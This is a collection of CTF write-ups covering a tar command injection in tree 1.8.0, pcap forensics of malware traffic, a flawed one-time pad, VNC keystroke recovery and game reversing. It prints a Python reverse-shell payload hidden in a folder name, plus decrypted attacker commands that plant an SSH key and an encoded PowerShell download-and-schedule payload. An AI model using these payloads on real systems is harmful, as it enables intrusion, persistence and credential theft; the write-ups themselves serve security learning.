# PWN: Stumpedsolver: [N04M1st3r](https://github.com/N04M1st3r) writeup-writer: [L3d](https://github.com/imL3d) **Description:**> Michael's computer science project shows the structure of tar files. It is using the tree command on the backend, and something just doesn't seem right... **files (copy):** [app.py](https://github.com/C0d3-Bre4k3rs/CyberCooperative2023-writeups/blob/main/stumped/files/app.py) **screenshot:** [homepage](https://github.com/C0d3-Bre4k3rs/CyberCooperative2023-writeups/blob/main/stumped/images/stumpedhome.png) In this challenge we receive a site (and it's code) that runs the unix [tree](https://linux.die.net/man/1/tree) command on an uploaded tar archive. We need to exploit this site and get user access. ## Solution ?When uploading a tar archive to the site to extract, we can write to anywhere on our system via carefully naming our folders. For example, if we have an archive with the path in it (the folder names are `..`): `../../../folder1/file1.txt` we can write into a folder called `folder1` that is 3 directories above us. This is due to an exploit known as [Zip Slip](https://security.snyk.io/research/zip-slip-vulnerability). Our first attempt of breaching this machine was to try and override some important file, in order to get and RCE or expose this machine to the internet. This was incredibly difficult since we didn't really have any information whatsoever on where this code was running from, or what with what privileges - so we abandoned the idea. After messing around a bit more with the site we noticed something about the text on it - it was powered via the `tree` command on version `1.8.0`. Also when uploading a tar archive the tree command displays in HTML output it's version which was, as expected `1.8.0`. We started to check the versions on our personal machines and compare them with the server's version - and we found it was outdated! (Except one of our teammates who had a depricated version which bugged us for a while ?). Could we someohow exploit this old version????? So, the search for the source code of this version began (or at least the release notes). Finding the entire source code was surprisingly difficult, but we managed to find it at the end - [the source code](https://salsa.debian.org/debian/tree-packaging). Looking at the source code of the old version, in `html.c` the there is a flawed implementation for a recursive call for `tree` command: ```Chcmd = xmalloc(sizeof(char) * (49 + strlen(host) + strlen(d) + strlen((*dir)->name)) + 10 + (2*strlen(path)));sprintf(hcmd,"tree -n -H \"%s%s/%s\" -L %d -R -o \"%s/00Tree.html\" \"%s\"\n", host,d+1,(*dir)->name,Level+1,path,path);system(hcmd);``` We verified this with the changelog of the version that followed `1.8.0`: ``` - -R option now recursively calls the emit_tree() function rather than using system() to re-call tree. Also removes a TODO. ``` BINGO! the `-R` option uses `system`, and we can exploit that to inject our OWN bash code. In order to exploit this we need to name one of our inside folders in the archive in a special way, to include the code that we want to run on the server (we went with a python reverse shell in this case): ```In a tar folder, zip the following: folder1->folder2->(injection folder)injection folder name (the quotes are part of the name): ";python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("yourserver",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["x2fbinx2fsh","-i"]);' ;echo "```We we upload the tar archive with this folder we get a reverse shell, and then quickly after the flag?:```$ cat flag.txtflag{n0t_5tump3d_4nym0r3!}```---This was a creative challenge that reminded us about updating our versions and not letting strangers upload tar archives into our servers. Also props to [N04M1st3r](https://github.com/N04M1st3r) for having the motivation to pull this one off ;) ![isitpwn.gif](https://github.com/C0d3-Bre4k3rs/CyberCooperative2023-writeups/blob/main/stumped/images/isitpwn.gif?raw=true)
# NETWROKING: dread pirate Original writeup (go check it out!): https://github.com/Om3rR3ich/CTF-Writeups/blob/main/Cyber%20Cooperative%202023/dread_pirate.md solver: [Om3rR3ich](https://github.com/Om3rR3ich) writeup-writer: [Om3rR3ich](https://github.com/Om3rR3ich) **Description**:> We've got an agent on the inside and we've tapped his network... ![dread_pirate_description_img](https://github.com/Om3rR3ich/CTF-Writeups/assets/88339137/8f115fcd-2327-4bb9-8e60-2425af60374e) This challenge is a classic of the networking category - you're given a packet capture that was sniffed from somewhere and you need to use it to find important information(i.e. the flag or something that leads you to it). Other than the capture file (dpr.pcapng), no information or background was provided. That had contributed to the mysteriousand explorative nature of the challenge. ## Wireshark Analysis"When all you have is a capture file, everything looks like Wireshark" Well, that's not really how the saying goes, but Wireshark is indeed the all-nail-hitting-hammer when it comes to analyzing network traffic. Opening dpr.pcapng in Wireshark, the screen becomes bloated with information: ![wireshark_initial_screen](https://github.com/Om3rR3ich/CTF-Writeups/assets/88339137/424d6e73-14d0-49ae-8c03-f6ef90aeb20d) As you may know, even short interactions and simple actions create a lot of traffic, so going through the packets one by one isn't feasible (and is excruciatingly slow).The first thing I usually look for is HTTP traffic, usually the important stuff will be there - what websites were accessed and what actions were performed.If you're lucky, an old website might use HTTP (instead of HTTPS, although in both cases the network protocol will be HTTP) so the data is not encrypted. Here, however, not a single HTTP packet is found (in retrospect, ALL of the IP addresses in the capture are private addresses, so everything's happening on a private network, so I shouldn't have expected computers to access websites) . It looks like the traffic is made up of mainly TCP and VNC (VNC is a TCP protocol, but it's still worth special treatment as you'll soon see). I wasn't familiar with the VNC protocol at all before this challenge, so I looked it up (this is just a friendly reminder that it's perfectly normal not to know everything and learn stuff during a CTF. Don't be afraid to learn something on the fly and apply it immediately - it may even work :) ). ## VNCIt's basically responsible for transmitting information about users' actions through the VNC program.Well, perhaps I need to go back a little. VNC (Virtual Network Computing) is a program that allows one computer to control another one, provided they're both connected to the same network. VNC is also the name of the network protocol that transmits the actions of the controlling computer to the controlled computer.It also shows the controlling computerthe controlled computer's screen by trasmitting chunks of a screenshot (JPEG image) to the controlling computer. This will be (very) important later. Fortunately, Wireshark has a very user-friendly interface to examine VNC packets. Here's an example of one interaction that I found after searching for the string "flag" (it was a little harder than that XD)in the VNC packets: ![wireshark_vnc_cut](https://github.com/Om3rR3ich/CTF-Writeups/assets/88339137/548f7a9a-8d1a-472e-a905-ba0f65a6cf05) Notice the properties in the Virtual Network Computing layer of the packet (bottom left of the image). The problem is, even after filtering for VNC packets, there is still too much data to go through manually. ## Keylogging?One interesting direction is to find the packets that are responsible for keyboard events. Wouldn't it be awesome to know everything the victim typed? There's also a ~~decent~~ nonzero chance he typed the flag... You can use the `vnc.key_down` filter in wireshark to look for key presses.It's important to use `key_down` rather than just `key`, because `key` would accountfor the `key_up` events which are just releases of keys, so you'll get every keypress twice. Since there are many `key_down` packets, this screams for automation. `scapy` is a neat Python library that helps managing packets (sending, receiving, sniffing, and analyzing them). Although `scapy` is great, it's not as user-friendly as Wireshark - I can't simply filter by `key_down` packets! To really achieve automation here, I needed to understand the structure of these packets so I can filter them myself.Let's have a closer look at this type of packets (the following example is the first one of them, it stands for pressing the key 'w'): ![wireshark_first_key_event](https://github.com/Om3rR3ich/CTF-Writeups/assets/88339137/a185fbb6-8674-4702-b57f-ef898314fbb6) As you can see, there's not really an obvious (at least at a first glance) connection between the VNC properties and the raw bytes (shown in hex).For this reason, I spent some time in a silly "find the differences game" between key events and mouse events, and especially key_down events vs key_up events.I assumed there's some binary flag that determines which one it is, and I was right - I marked the relevant byte in blue in the above image. If this byte is 1, it's a key_down, otherwise - a key_up. In a similar fashion I discovered that all key events had a 04 byte right before the previous (marked) byte I was referring to. Lastly, the value of the key pressed is held in the last four bytes of the packet's payload. I only cared about ASCII characters (you can guess when Enter, Shift, etc were used and I was too lazy to make a mapping between the special keys and their respective codes),so I could save just the last byte. Armed with the above information, dumping the keystokes is simple (I'm not going to go over how to use `scapy` here, because that's not the goal of this writeup and the syntax is fairly intuitive): ```pythonfrom scapy.all import * packets = rdpcap('dpr.pcapng') typed_text = bytearray(b'') for pkt in packets: if pkt.haslayer(Raw): load = pkt[Raw].load # key event (first byte in the payload is 04) if load[0] == 4: # key down event (the down/up flag is set to 01) if load[1] == 1: typed_text.append(load[-1]) print(typed_text)``` \* It's worth noting that the packet structure analysis can be done easily within Wireshark - just click on the desired peroperty and it'll mark the bytes that control its value. If only I knew that when I originally solved the challenge! Running the script results in the following output:```pythonbytearray(b'weecat\r/server add silk irc/6667\r/connect silk\r/i\x08nick drerd\r2you dii bitcoin exchange before you worke d\x08\x08d fr me ig\x00t\xe1? \rnot any more then\xe1? damn regulators, eh\xe1? \rokay which post\xe1? \r')```\* Notice the "garbage bytes" - these were originally codes of special keys of which I trimmed the last byte. Hmmmm, this is some fairly interesting information. It looks like two users ('weecat' and 'nick dred') are communicaing via IRC, but the conversation seem to halt prematuerly.In addition, the last question (which post?) immediately reminded me of the previously cut text ("can you check out one of the flagged messages for me?"). Surely they're referring to the flag, right? It's so unfortunate that there's no more information... But maybe not all hope is lost. ## Exploring IRC (the black hole that is port 6667)At this point we know the juicy stuff is communicated via IRC, which goes through port 6667.Filtering for TCP packets on port 6667, a hellish sight unfolds: ![wireshark_tcp_port_6667](https://github.com/Om3rR3ich/CTF-Writeups/assets/88339137/2b7226f6-7930-4a6c-b841-8c485aafc96c) I'll save you the trouble, there's no recoverable information from this mess - it looks TCP data was acknowledged (ACKed) but wasn't captured by Wireshark. So, what now? ## JPEGs hidden in plain sightRemember how VNC transmits screenshots in JPEG "chunks" (i.e. small portions of the image, not the usual meaning of chunk in an image file)?Since everything else seemed to be a dead end, I figured I should have a look at that. Now, I can guess what you're thinking - how the hell is it possible to stare atthe packets for so long and not notice all of these JPEG headers? Well, I did notice them, but initially thought they were corrupted because they lacked a consistent ending (footer).Apparently, [there's no footer in the JPEG format](https://stackoverflow.com/questions/4999528/jpeg-footer-read). Anyway, I tried to use `binwalk` to extract the images, but for whatever reason it failed to extract them (it did detect them correctly). Luckily, there are alternativesto `binwalk`, for instance, `foremost`. `foremost dpr.pcapng` worked just fine, and extracted all (400+) of the images. Browsing through the images, I noticed that while many of them were too small to supply any menaingful information, some actually showed snippets of the IRC chat! Piecing together the images (in my mind, I didn't bother converting them to bigger, complete images), I noticed messages that I've seen before - in the result of the keystrokes dumper script. It looks like some of the packets were lost, because some letters were indeed missing. 'weecat' is not a silly username - it's actually 'weechat' ('h' was probably lost in trasmittion) -the platform that was used for the communication (you can run it as a command in linux). Also, the second user isn't 'nick dred', but 'nick **dread**'! Just like the challenge's name. After doing that for a while, I made an educated guess that the flag will appear near the end of the communication.Looking at the images in reverse order (from the last one to the first), I quickly found the flag, right there in the IRC chat: ![flag_message_irc](https://github.com/Om3rR3ich/CTF-Writeups/assets/88339137/177eaf2c-d9be-4e29-a5e7-fe6c51d1e214) That's the flag! `flag{knock_knock_open_up_its_the_fbi}` You may wonder why the flag didn't show up in the result of the keystrokes dump. The most plausible explanation I can think of is that another person (not the one who's controlling the computer over VNC) typed this message. ## AddendumNetworking, as a subject, tends to be greyer than a group of mice (apparently called a 'mischief') covered in gravel on a winter day (i.e. boring). However, this challenge, although frustrating, was actually fun to solve. It puts the player in a detective role,and challenge feels like an adventure (rather than an endless day at an office, doing the type of work that makes you burn out after a year, which is how most networking related tasks feel like). In my opinion, the lesson here is that adding backstory (even just a little, like the "nick dread pirate" thing) to challenges makes them much more interesting and rewarding to solve,and also, not to judge a CTF challenge by its category ;) *Writeup by Om3rR3ich*
# Forensics: data-siegesolver: [Pr0f3550rZak](https://github.com/Pr0f3550rZak) writeup-writer: [Pr0f3550rZak](https://github.com/Pr0f3550rZak) + [L3d](https://github.com/imL3d)___**Author:** Nauten **Description:**> It was a tranquil night in the Phreaks headquarters, when the entire district erupted in chaos. Unknown assailants, rumored to be a rogue foreign faction, have infiltrated the city's messaging system and critical infrastructure. Garbled transmissions crackle through the airwaves, spewing misinformation and disrupting communication channels. We need to understand which data has been obtained from this attack to reclaim control of the communication backbone. Note: Flag is split into three parts. **files (from [HTB](https://github.com/hackthebox/cyber-apocalypse-2024)):** [forensics_data_siege.zip](https://github.com/hackthebox/cyber-apocalypse-2024/raw/main/forensics/%5BMedium%5D%20Data%20Siege/release/forensics_data_siege.zip) In this challenge we are given a network capture file, “capture.pcap”. We need to analyse this capture file, and extract the flag. ## Solution ? On first examination we see that this is a `TCP/IP` and `HTTP` communication. Nothing really pops on a first glace, so this time we decide to use a PCAP online analysis tool, to help us speed up the process. We upload the capture to [A-Packets](https://apackets.com/). This helps us find an HTTP request for downloading and executable: ![screenshot1](https://github.com/C0d3-Bre4k3rs/HTBCyberApocalypseCTF2024-Writeups/raw/main/data-siege/_images/screenshot1.png?raw=true) So let's download it as well! We can see its a `.NET windows executable`, so we can decompile it using [dnSpy](https://github.com/dnSpy/dnSpy). During the same analysis that gave us the EXE, we notice that on port `1234`, there are unusual strings that seems like they are encoded in base64, but they cannot be decoded on properly in that way. They may be related to the executable, but we leave them to be at this point. After decompiling the executable we notice an interesting function: `Encrypt`: ![screenshot2](https://github.com/C0d3-Bre4k3rs/HTBCyberApocalypseCTF2024-Writeups/raw/main/data-siege/_images/screenshot2.png?raw=true) And upon further investigation we can see the constants that are being used by the program: ![screenshot3](https://github.com/C0d3-Bre4k3rs/HTBCyberApocalypseCTF2024-Writeups/raw/main/data-siege/_images/screenshot3.png?raw=true) So we were right! The traffic on port `1234` is being encrypted, so let's decrypt it! We create a bodged C# code, and the only thing left is to input each base64 encoded string from the pcap file, and decrypt them: ```C# using System.IO;using System.Security.Cryptography;using System.Text;using System; public class Main{ public static void Main(string[] args) { string cipherText = ""; string encryptKey = "VYAemVe03zUDTL6N62kVA"; byte[] array = Convert.FromBase64String(cipherText); using(Aes aes = Aes.Create()) { Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(encryptKey, new byte[] { 86, 101, 114, 121, 95, 83, 51, 99, 114, 51, 11, 95, 83 }); aes.Key = rfc2898DeriveBytes.GetBytes(32); aes.IV = rfc2898DeriveBytes.GetBytes(16); using (MemoryStream memoryStream = new MemoryStream()) { using (CryptoStream cryptoStream = new CryptoStream(memoryStream, aes.CreateDecryptor(), CryptoStreamMode.Write)) { cryptoStream.Write(array, 0, array.Length); cryptoStream.Close(); } cipherText = Encoding.Default.GetString(memoryStream.ToArray()); } } Console.WriteLine(cipherText); }} ``` The output is bunch of cmd commands to run. These are the important parts out of it:```cmd;C:\;echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCwyPZCQyJ/s45lt+cRqPhJj5qrSqd8cvhUaDhwsAemRey2r7Ta+wLtkWZobVIFS4HGzRobAw9s3hmFaCKI8GvfgMsxDSmb0bZcAAkl7cMzhA1F418CLlghANAPFM6Aud7DlJZUtJnN2BiTqbrjPmBuTKeBxjtI0uRTXt4JvpDKx9aCMNEDKGcKVz0KX/hejjR/Xy0nJxHWKgudEz3je31cVow6kKqp3ZUxzZz9BQlxU5kRp4yhUUxo3Fbomo6IsmBydqQdB+LbHGURUFLYWlWEy+1otr6JBwpAfzwZOYVEfLypl3Sjg+S6Fd1cH6jBJp/mG2R2zqCKt3jaWH5SJz13 HTB{c0mmun1c4710n5 >> C:\Users\svc01\.ssh\authorized_keyscmd;C:\; ... Password: Passw0rdCorp54212nd flag part: _h45_b33n_r357 ... ``` And a base64 encoded powerhsell payload: ```ps1 powershell.exe -encoded "CgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAIgBoAHQAdABwAHMAOgAvAC8AdwBpAG4AZABvAHcAcwBsAGkAdgBlAHUAcABkAGEAdABlAHIALgBjAG8AbQAvADQAZgB2AGEALgBlAHgAZQAiACwAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAHMAdgBjADAAMQBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwANABmAHYAYQAuAGUAeABlACIAKQAKAAoAJABhAGMAdABpAG8AbgAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAHMAdgBjADAAMQBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwANABmAHYAYQAuAGUAeABlACIACgAKACQAdAByAGkAZwBnAGUAcgAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0ARABhAGkAbAB5ACAALQBBAHQAIAAyADoAMAAwAEEATQAKAAoAJABzAGUAdAB0AGkAbgBnAHMAIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAKAAoAIwAgADMAdABoACAAZgBsAGEAZwAgAHAAYQByAHQAOgAKAAoAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBOAGEAbQBlACAAIgAwAHIAMwBkAF8AMQBuAF8ANwBoADMAXwBoADMANABkAHEAdQA0AHIANwAzAHIANQB9ACIAIAAtAEEAYwB0AGkAbwBuACAAJABhAGMAdABpAG8AbgAgAC0AVAByAGkAZwBnAGUAcgAgACQAdAByAGkAZwBnAGUAcgAgAC0AUwBlAHQAdABpAG4AZwBzACAAJABzAGUAdAB0AGkAbgBnAHMACgA=" ``` When extracting the base64 payload we find the 3d flag part (the first 2 are in the commands we found above). Concatenating all of them we get the flag ?: `HTB{c0mmun1c4710n5_h45_b33n_r3570r3d_1n_7h3_h34dqu4r73r5}` Yippe!
# CRYPTO: nullnullsolvers: [L3d](https://github.com/imL3d), [N04M1st3r](https://github.com/N04M1st3r) writeup-writer: [L3d](https://github.com/imL3d) **Description:**>Welcome to my secure flag sharer where there are null nulls!> nc 0.cloud.chals.io 15076 **files (copy):** [server.py](https://github.com/C0d3-Bre4k3rs/CyberCooperative2023-writeups/blob/main/nullnull/files/server.py) In this challenge we receive a connection to the server that sends us the flag encrypted strongly ## Solution?️Upon analyzing the server code we can understand that it encrypts the flag each time with a newly created key which is at least the length of the flag (essentially an [OTP](https://en.wikipedia.org/wiki/One-time_pad)). After goofing around and trying to break python's random ([it is possible!](https://www.kaggle.com/code/taahakhan/rps-cracking-random-number-generators)), we saw a little bug in this code: it never (never) includes a part of the original key in the ciphertext - **the random key generation starts with 1, not 0**. In order to exploit this vulnerability we just need to track the letters given, and with enough retries we can find out what characters aren't used... ```pythonimport socketfrom string import printable options = [[p for p in printable[:-2]] for _ in range(49)] sock = socket.socket()sock.connect(('0.cloud.chals.io', 15076))data = sock.recv(1024) iteration = 1while True: sock.sendall(b'Y\n') data = sock.recv(1024).decode() recived = ''.join(data.split('\n')[:-1]) try: enc = eval(recived) # eval is evil... but we trust the server, right? RIGHT??? except Exception as e: print(e) print(recived) exit() for i, c in enumerate(enc): if chr(c) in options[i]: options[i].remove(chr(c)) print(f'{iteration=}') print([len(o) for o in options]) iteration+=1 with open('output.txt', 'w') as f: for o in options: f.write(str(o) + ', \n') sock.close()```Running this code (for some reason `pwntools` didn't work if you wondered), results in the flag ?: `flag{so_many_possibilities_but_only_one_solution}`
We can access the flag with a simple Google search. ![](https://margheritaviola.com/wp-content/uploads/2024/03/image-44.png) ![](https://margheritaviola.com/wp-content/uploads/2024/03/image-45.png) ```wctf{h41L_t0_th3_v1ct0rs_v4l14nt_h41L_t0_tH3_c0Nqu3r1nG_h3r035}```
## snakemas is coming --- #### Description:*Luckily, the most beautiful season of the year is near. I need to decoratemy house with the coolest things ever! I found this super big mall on the internet who sells the perfect decoration!!! But I don’t have money :( I need a planto steal the decoration. Maybe I can hack the webcams to watch the securityfootages and find the perfect moment to act! I can try my new hacking attack!* *Here are the commands:1. e4 e5 2. b3 * *Flag format: snakeCTF{TheNameOfTheAttack}* --- The title and the description of the challenge refer to the Christmas season,which will turn out to be an essential clue for solving the challenge. The *commands* provided are chess moves and they’re the movesof the King’s Pawn Opening. Please note that in chess an asterisk is usuallyused to refer to an unknown result or a possibly incomplete game, but in ourcase it doesn’t really matter. As I previously said, we are facing a King’s Pawn Opening. However, this isnot the right answer!I am not a chess player so I struggled a lot with this challenge... But I didn’t give up, I kept going! After I was almost done with this challenge, I got an epiphany (luckily). I thought: ”if I know that it is a King’s Pawn Opening, why don’t I justsearch it up online and add the *Christmas* keyword?” By doing so I found**this post** on Chess.com written by a user called X PLAYER J X who decided to invent a chess opening to portray the holiday spirit. *Please check out [my writeup on GitHub](https://github.com/marihere/CTF_writeups/blob/main/snakeCTF2023/snakemas%20is%20coming) for the images and references.* --- The flag is:### snakeCTF{TheSantaClausAttack}
# game-graphics-debugging *this is a clone. check out the original! [https://github.com/Om3rR3ich/CTF-Writeups/blob/main/WolvCTF%202024/game_graphics_debugging.md](https://github.com/Om3rR3ich/CTF-Writeups/blob/main/WolvCTF%202024/game_graphics_debugging.md)* solver: [5h4d0w ](https://github.com/Om3rR3ich) writeup-writer: [5h4d0w](https://github.com/Om3rR3ich) ## Challenge Description **Author:** ravbug **Description**: I put a flag in this game, but I can't see it! Can you find it for me? ![chall_description](https://github.com/Om3rR3ich/CTF-Writeups/assets/88339137/8bfd59fa-4281-4299-b451-1da7cb87fb15) As per usual - you're given a binary (in this case, you can choose your favorite architecture), and you're supposed to find the hidden flag.Unlike many reversing challenges, there's not a clear path to the goal (e.g. pass the authentication system). ## Sometimes Broken Things Deserve to Be RepairedBefore diving into the binary, I decided to run it to get a feel for what it does: ![error_message](https://github.com/Om3rR3ich/CTF-Writeups/assets/88339137/12af9638-9827-41a1-9239-2ecb289ef780) Well, it looks like some setup needs to be done to even begin reversing this. The application fails to find an expected symbol (`vkCmdPipelineBarrier2`), so it crashes.A quick google search yields that this is a function in Vulkan - a cross-platform 3D graphics API (hence the support of multiple archicterus in this challenge).Nevertheless, if you've solved `Missing Resources`, you know how these error messages can be misleading. The problem might be way deeper.To make sure, I loaded the app into IDA and debugged the execution flow.To avoid crashing (IDA defaults to running the given executable without suspending at any point), I enabled `Suspend on library load/unload` (in Debugger->Debugger options).In addition, I recommend enabling `Suspend on entry point`, to easily check whether the entry point is ever reached. ![dlls_loaded](https://github.com/Om3rR3ich/CTF-Writeups/assets/88339137/698773bd-c7a3-4b90-907e-fd4e9e985d08) Don't be fooled into thinking the problematic DLL is `VCRUNTIME140_1.dll` - it causes an exception because it looks for a non-existing function. However, vulkan-1 does existin my machine and is successfully loaded (wasn't unloaded). The problem turned out to be that the application required a different version of vulkan than the one I had,but still expected it to be called `vulkan-1.dll`. Downloading the expected version of vulkan (and renaming it to vulkan-1.dll to make the program load it) results in a continuationof the execution flow. ![correct_dll_loaded](https://github.com/Om3rR3ich/CTF-Writeups/assets/88339137/bc474c0d-5cb0-4f0f-a1fd-c9e18eb233a3) In general, an app will first look up a DLL in its own directory, so whenever you want to perform a little switcheroo you can simply copy your desired versionto the executable's location. ## History is mostly guessing; the rest is prejudice After fixing the app, running it resulted in the following: ![normal_execution](https://github.com/Om3rR3ich/CTF-Writeups/assets/88339137/40fb0aea-6733-4abe-9c6c-7b697a59b0e7) Well, now what? Since the binary is stripped, the standard approach is to just start at the beginning (`_start`). This is the first step in a long road of pain and misery, so I'm going to skipthat attempt altogether. Are there any interesting strings (that lead to interesting parts of the source by an Xref)?YES, but for whatever reason (probably an unexpected encoding) IDA couldn't parse them correctly so they didn't show up. "Running to user code" also yielded nothing of interest. With the standard techniques out of the way, we let the guessing game begin! Fast forward to the one that actually worked, ✨ my intuition ✨ led me to believe that the flag is hidden somewhere between creating the window (when the name is still 'RavEngine' - which is the fault),and the creation of the graphics. But where is that? Since I couldn't get there by an Xref from a string, I decided to find the function that's used to change the title.As it turns out, the call to this function is very obfuscated, so looking up SDL's `SetWindowTitle` (or any of the standard functions) didn't work. In a moment of clarity, I recalled that flags are fairly commonly hidden in the TLS of the graphics (or another ) thread, so I looked for an attempt to access the TLS.As a result, discovered the following codeblock: ```cpp v21 = (__m128i *)*((_QWORD *)NtCurrentTeb()->ThreadLocalStoragePointer + (unsigned int)TlsIndex); v22 = v21[6].m128i_i32[2]; flag_arr = v21[4].m128i_i8; if ( (v22 & 1) == 0 ) { v21[6].m128i_i32[2] = v22 | 1; v21[6].m128i_i8[7] = 1; if ( flag_arr > &v161 || &v21[6].m128i_u16[3] < (unsigned __int16 *)v158 ) { *(__m128i *)flag_arr = si128; v21[5] = v20; v21[6].m128i_i32[0] = v159; v21[6].m128i_i16[2] = v160; v21[6].m128i_i8[6] = -45; } else { *(__m128i *)flag_arr = si128; v21[5] = v20; v21[6].m128i_i32[0] = v159; v21[6].m128i_i16[2] = v160; v21[6].m128i_i8[6] = -45; } _tlregdtor(&unk_7FF79A524270); } if ( flag_arr[39] ) { *flag_arr ^= 0x8Fu; flag_arr[1] ^= 0xC7u; flag_arr[2] ^= 0xFu; flag_arr[3] ^= 0x57u; flag_arr[4] ^= 0xFDu; flag_arr[5] ^= 0xDBu; flag_arr[6] ^= 0xD3u; flag_arr[7] ^= 0xC7u; flag_arr[8] ^= 0x8Fu; flag_arr[9] ^= 0xC7u; flag_arr[10] ^= 0xFu; flag_arr[11] ^= 0x57u; flag_arr[12] ^= 0xFDu; flag_arr[13] ^= 0xDBu; flag_arr[14] ^= 0xD3u; flag_arr[15] ^= 0xC7u; flag_arr[16] ^= 0x8Fu; flag_arr[17] ^= 0xC7u; flag_arr[18] ^= 0xFu; flag_arr[19] ^= 0x57u; flag_arr[20] ^= 0xFDu; flag_arr[21] ^= 0xDBu; flag_arr[22] ^= 0xD3u; flag_arr[23] ^= 0xC7u; flag_arr[24] ^= 0x8Fu; flag_arr[25] ^= 0xC7u; flag_arr[26] ^= 0xFu; flag_arr[27] ^= 0x57u; flag_arr[28] ^= 0xFDu; flag_arr[29] ^= 0xDBu; flag_arr[30] ^= 0xD3u; flag_arr[31] ^= 0xC7u; flag_arr[32] ^= 0x8Fu; flag_arr[33] ^= 0xC7u; flag_arr[34] ^= 0xFu; flag_arr[35] ^= 0x57u; flag_arr[36] ^= 0xFDu; flag_arr[37] ^= 0xDBu; flag_arr[38] ^= 0xD3u; flag_arr[39] = 0; }``` Notice anything suspicious (I put a pretty big hint XD)? It looks like some chunk of data is extracted from the TLS of the graphics thread and XORed with hardcoded values.The null byte at the end of the byte array is a dead giveaway for a string, and that string is indeed the flag.Place a breakpoint at the end of this codechunk, and examine the memory to find: ![flag_in_memory](https://github.com/Om3rR3ich/CTF-Writeups/assets/88339137/d649ebdf-2150-40ad-a6ad-d26d7232f26b) The (full) flag is: **wctf{your-d3sc3nt-into-gamedev-beg1ns}**
# Forensics: fake-boostsolver: [Pr0f3550rZak](https://github.com/Pr0f3550rZak) writeup-writer: [Pr0f3550rZak](https://github.com/Pr0f3550rZak) + [L3d](https://github.com/imL3d)___**Author:** gordic **Description:**> In the shadow of The Fray, a new test called "Fake Boost" whispers promises of free Discord Nitro perks. It's a trap, set in a world where nothing comes without a cost. As factions clash and alliances shift, the truth behind Fake Boost could be the key to survival or downfall. Will your faction see through the deception? KORP™ challenges you to discern reality from illusion in this cunning trial. **files (from [HTB](https://github.com/hackthebox/cyber-apocalypse-2024)):** [forensics_fake_boost.zip](https://github.com/hackthebox/cyber-apocalypse-2024/raw/main/forensics/%5BEasy%5D%20Fake%20Boost/release/forensics_fake_boost.zip) In this challenge, we are given a file, "capture.pcapng". We need to analyse this capture file, and extract the flag. ## Solution ### Part 1 ? Upon examining the pcapng we see that it's essense is an HTTP communication, and on closer look we can find specifically one interesting packet, that seems to contain a long base64 encoded string - some sort of a powershell exploit: ![screenshot1](https://github.com/C0d3-Bre4k3rs/HTBCyberApocalypseCTF2024-Writeups/raw/main/fake-boost/_images/screenshot1.png?raw=true) Lets understand what it does: First, it saves a base64 encoded string into a variable, then reverses the string, then decodes it, and then executes it. So let's do the same! (Except [running it](_images/ran.gif) ;)) We get this powerhsell script output: [output.ps](files/output.ps1). This code extracts some important data out of the machine, then encrypted it, and finally posts it to the following endpoint: `"http://192.168.116.135:8080/rj1893rj1joijdkajwda"`. Another important thing we can see is the first part of the flag: `$part1 = "SFRCe2ZyMzNfTjE3cjBHM25fM3hwMDUzZCFf"` After decoding: `“HTB{fr33_N17r0G3n_3xp053d!_”`. ### Part 2 ? After filtering by packets that are being sent to the endpoint we saw earlier, we found one packet that seems unique - again, with a base64 endoded string: ![screenshot2](_images/screenshot2.png?raw=true) To decrypt it we need to use [AES](https://en.wikipedia.org/wiki/Advanced_Encryption_Standard) mode CBC, as the powershell exploit we found at the first part encrypt this in that way: ```ps1# This function is being called without $mode# The default encryption mode for the AesManaged object is CBCfunction Create-AesManagedObject($key, $IV, $mode) { $aesManaged = New-Object "System.Security.Cryptography.AesManaged" ...}...$AES_KEY = "Y1dwaHJOVGs5d2dXWjkzdDE5amF5cW5sYUR1SWVGS2k="```Using a short python script we decrypt the the message, to find the flag:```pythonfrom Crypto.Cipher import AESimport base64 cipher = AES.new(base64.b64decode(key.encode()), AES.MODE_CBC)decrypted = cipher.decrypt(base64.b64decode(encrypted.encode())) print(decrypted)```And the output: ```b'\xaf\xb1\x81Df\xb9\xe4\xedu\xb2\xb0\xde\xea\x8f\x19\xbc[\r\n {\r\n "ID": "1212103240066535494",\r\n "Email": "YjNXNHIzXzBmX1QwMF9nMDBkXzJfYjNfN3J1M18wZmYzcjV9",\r\n "GlobalName": "phreaks_admin",\r\n "Token": "MoIxtjEwMz20M5ArNjUzNTQ5NA.Gw3-GW.bGyEkOVlZCsfQ8-6FQnxc9sMa15h7UP3cCOFNk"\r\n },\r\n {\r\n "ID": "1212103240066535494",\r\n "Email": "YjNXNHIzXzBmX1QwMF9nMDBkXzJfYjNfN3J1M18wZmYzcjV9",\r\n "GlobalName": "phreaks_admin",\r\n "Token": "MoIxtjEwMz20M5ArNjUzNTQ5NA.Gw3-GW.bGyEkOVlZCsfQ8-6FQnxc9sMa15h7UP3cCOFNk"\r\n }\r\n]\x05\x05\x05\x05\x05'```Again, decoding further with base64 the email's content, we find the rest of the flag: `"b3W4r3_0f_T00_g00d_2_b3_7ru3_0ff3r5}"` Flag?: `"HTB{fr33_N17r0G3n_3xp053d!_b3W4r3_0f_T00_g00d_2_b3_7ru3_0ff3r5}"`
